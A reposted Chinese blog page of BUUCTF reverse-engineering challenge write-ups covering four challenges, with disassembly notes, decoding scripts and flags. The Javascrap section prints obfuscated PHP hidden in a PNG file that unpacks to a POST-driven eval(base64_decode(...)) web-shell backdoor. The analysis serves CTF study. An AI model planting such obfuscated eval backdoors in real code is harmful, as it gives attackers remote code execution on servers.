當(dāng)前位置：首頁 > 编程资源 > 编程问答 >内容正文

编程问答

REVERSE-PRACTICE-BUUCTF-25

發(fā)布時(shí)間：2023/12/10 编程问答 37 豆豆

生活随笔收集整理的這篇文章主要介紹了 REVERSE-PRACTICE-BUUCTF-25 小編覺得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

REVERSE-PRACTICE-BUUCTF-25

- 特殊的 BASE64
- [FlareOn1]Javascrap
- [WMCTF2020]easy_re
- [NPUCTF2020]BasicASM

特殊的 BASE64

exe程序，運(yùn)行后輸入，無殼，ida分析
main函數(shù)，讀取輸入，進(jìn)行變表base64編碼，與rightFlag比較驗(yàn)證

在字符串窗口找到變表

用工具解base64即可得到flag

[FlareOn1]Javascrap

html文件什么都得不到
用010 editor打開那個(gè)png文件，在文件最后隱寫了php代碼

<?php $terms=array("M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|"); $order=array(59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 17, 37, 63, 58, 37, 91, 63, 83, 43, 87, 42, 24, 60, 87, 93, 18, 87, 66, 28, 48, 19, 66, 63, 50, 37, 91, 63, 17, 1, 87, 93, 18, 45, 66, 28, 48, 19, 40, 11, 25, 5, 70, 63, 7, 37, 91, 63, 12, 1, 87, 93, 18, 81, 37, 28, 48, 19, 12, 63, 25, 37, 91, 63, 83, 63, 87, 93, 18, 87, 23, 28, 18, 75, 49, 28, 48, 19, 49, 0, 50, 37, 91, 63, 18, 50, 87, 42, 18, 90, 87, 93, 18, 81, 40, 28, 48, 19, 40, 11, 7, 5, 70, 63, 7, 37, 91, 63, 12, 68, 87, 93, 18, 81, 7, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 18, 17, 37, 0, 50, 5, 40, 42, 50, 5, 49, 42, 25, 5, 91, 63, 50, 5, 70, 42, 25, 37, 91, 63, 75, 1, 87, 93, 18, 1, 17, 80, 58, 66, 3, 86, 27, 88, 77, 80, 38, 25, 40, 81, 20, 5, 76, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 7, 88, 32, 45, 7, 90, 52, 80, 58, 5, 70, 63, 7, 5, 66, 42, 25, 37, 91, 0, 12, 50, 87, 63, 83, 43, 87, 93, 18, 90, 38, 28, 48, 19, 7, 63, 50, 5, 37, 0, 24, 1, 87, 0, 24, 72, 66, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 1, 87, 93, 18, 11, 66, 28, 18, 87, 70, 28, 48, 19, 7, 63, 50, 5, 37, 0, 18, 1, 87, 42, 24, 60, 87, 0, 24, 17, 91, 28, 18, 75, 49, 28, 18, 45, 12, 28, 48, 19, 40, 0, 7, 5, 37, 0, 24, 90, 87, 93, 18, 81, 37, 28, 48, 19, 49, 0, 50, 5, 40, 63, 25, 5, 91, 63, 50, 5, 37, 0, 18, 68, 87, 93, 18, 1, 18, 28, 48, 19, 40, 0, 25, 5, 37, 0, 24, 90, 87, 0, 24, 72, 37, 28, 48, 19, 66, 63, 50, 5, 40, 63, 25, 37, 91, 63, 24, 63, 87, 63, 12, 68, 87, 0, 24, 17, 37, 28, 48, 19, 40, 90, 25, 37, 91, 63, 18, 90, 87, 93, 18, 90, 38, 28, 18, 19, 66, 28, 18, 75, 70, 28, 48, 19, 40, 90, 58, 37, 91, 63, 75, 11, 79, 28, 27, 75, 3, 42, 23, 88, 30, 35, 47, 59, 71, 71, 73, 35, 68, 38, 63, 8, 1, 38, 45, 30, 81, 15, 50, 12, 1, 24, 81, 66, 28, 40, 90, 58, 81, 40, 30, 75, 1, 27, 19, 75, 28, 23, 75, 77, 1, 28, 1, 43, 52, 31, 19, 75, 81, 40, 30, 75, 1, 27, 75, 77, 35, 47, 59, 71, 71, 71, 73, 21, 4, 37, 51, 40, 4, 7, 91, 7, 4, 37, 77, 49, 4, 7, 91, 70, 4, 37, 49, 51, 4, 51, 91, 4, 37, 70, 6, 4, 7, 91, 91, 4, 37, 51, 70, 4, 7, 91, 49, 4, 37, 51, 6, 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47); $do_me=""; for($i=0;$i<count($order);$i++) {$do_me=$do_me.$terms[$order[$i]];} eval($do_me); ?>

把最后的eval改成echo，找個(gè)php在線工具執(zhí)行一下，打印

$_=\'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9\'; $__=\'JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7\'; $___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"; eval($___($__));

將第一個(gè)字符串$_解base64

將\97\49\x31開始的數(shù)據(jù)摳出來，轉(zhuǎn)成字符串，做點(diǎn)簡(jiǎn)單變換即為flag

data=[97,49,0x31,68,0x4f,0x54,116,104,0x61,116,0x44,79,0x54,106,97,118,97,53,0x63,114,0x61,0x70,65,84,102,0x6c,0x61,114,101,0x44,65,0x53,72,111,0x6e,0x44,0x4f,84,99,0x6f,0x6d] print(''.join(chr(i) for i in data)) # a11DOTthatDOTjava5crapATflareDASHonDOTcom # a11.that.java5crap@flare-on.com

[WMCTF2020]easy_re

exe程序，perl語言寫的，ida看不出什么東西
上x64dbg，F8單步調(diào)試，運(yùn)行到這里時(shí)可以看到代碼
（直接搜索字符串"script"，可以找到解壓call，下斷后F9，也可看到代碼）
將輸入與已定義的flag比較，直接交flag即可

$flag = \"WMCTF{{I_WAnt_dynam1c_F1ag}}\"; print \"please input the flag:\"; $line = <STDIN>; chomp($line); if($line eq $flag) {{print \"congratulation!\"}} else {{print \"no,wrong\"}}

[NPUCTF2020]BasicASM

匯編代碼，主要的邏輯為
讀取輸入，輸入的下標(biāo)為奇數(shù)時(shí)，輸入的內(nèi)容異或0x42，下標(biāo)為偶數(shù)時(shí)不變
將變換后的輸入轉(zhuǎn)成十六進(jìn)制輸出

00007FF7A8AC5A92 lea rcx,[flag] 00007FF7A8AC5A96 call std::basic_string<char,std::char_traits<char>,std::allocator<char> >::basic_string<char,std::char_traits<char>,std::allocator<char> > (07FF7A8AC15E1h) 00007FF7A8AC5A9B nop 00007FF7A8AC5A9C mov dword ptr [p],0 //[p]==0 00007FF7A8AC5AA3 mov dword ptr [rbp+64h],0 //[rbp+64h]==0 00007FF7A8AC5AAA jmp main+64h (07FF7A8AC5AB4h) 00007FF7A8AC5AAC mov eax,dword ptr [rbp+64h] 00007FF7A8AC5AAF inc eax 00007FF7A8AC5AB1 mov dword ptr [rbp+64h],eax //[rbp+64h]==1 00007FF7A8AC5AB4 movsxd rax,dword ptr [rbp+64h] 00007FF7A8AC5AB8 mov qword ptr [rbp+1F8h],rax //[rbp+1F8h]==1 00007FF7A8AC5ABF lea rcx,[flag] 00007FF7A8AC5AC3 call std::basic_string<char,std::char_traits<char>,std::allocator<char> >::length (07FF7A8AC122Bh) 00007FF7A8AC5AC8 mov rcx,qword ptr [rbp+1F8h] //rcx==1 00007FF7A8AC5ACF cmp rcx,rax //rax==length(input) 00007FF7A8AC5AD2 jae main+1B2h (07FF7A8AC5C02h) 00007FF7A8AC5AD8 mov eax,dword ptr [rbp+64h] //eax==[rbp+64h]==1 00007FF7A8AC5ADB and eax,1 //eax&1 00007FF7A8AC5ADE cmp eax,1 //判斷是否為奇數(shù) 00007FF7A8AC5AE1 jne main+126h (07FF7A8AC5B76h) 00007FF7A8AC5AE7 movsxd rax,dword ptr [rbp+64h] //rax==[rbp+64h]==1 00007FF7A8AC5AEB mov rdx,rax 00007FF7A8AC5AEE lea rcx,[flag] 00007FF7A8AC5AF2 call std::basic_string<char,std::char_traits<char>,std::allocator<char> >::operator[] (07FF7A8AC1442h) 00007FF7A8AC5AF7 movsx eax,byte ptr [rax] //eax==input[1] 00007FF7A8AC5AFA xor eax,42h //eas^0x42 00007FF7A8AC5AFD mov dword ptr [p],eax //[p]==eax 00007FF7A8AC5B00 mov dl,30h 00007FF7A8AC5B02 lea rcx,[rbp+144h] 00007FF7A8AC5B09 call std::setfill<char> (07FF7A8AC1046h) 00007FF7A8AC5B0E mov qword ptr [rbp+1F8h],rax 00007FF7A8AC5B15 mov edx,2 00007FF7A8AC5B1A lea rcx,[rbp+168h] 00007FF7A8AC5B21 call std::setw (07FF7A8AC10D2h) 00007FF7A8AC5B26 mov qword ptr [rbp+200h],rax 00007FF7A8AC5B2D lea rdx,[std::hex (07FF7A8AC1488h)]//十六進(jìn)制 00007FF7A8AC5B34 mov rcx,qword ptr [__imp_std::cout (07FF7A8AD71C0h)] 00007FF7A8AC5B3B call qword ptr [__imp_std::basic_ostream<char,std::char_traits<char> >::operator<< (07FF7A8AD7160h)] //輸出

由輸出的十六進(jìn)制字串寫腳本即可得到flag

res="662e61257b26301d7972751d6b2c6f355f3a38742d74341d61776d7d7d" data=[] for i in range(0,len(res),2):data.append(int('0x'+res[i:i+2],16)) for i in range(1,len(data),2):data[i]^=0x42 print(''.join(chr(i) for i in data)) #flag{d0_y0u_know_x86-64_a5m?} 創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎(jiǎng)勵(lì)來咯，堅(jiān)持創(chuàng)作打卡瓜分現(xiàn)金大獎(jiǎng)

總結(jié)

以上是生活随笔為你收集整理的REVERSE-PRACTICE-BUUCTF-25的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。

上一篇： Hive环境搭建(完整版)-配置
下一篇： Hexo 双线部署到 Coding Pa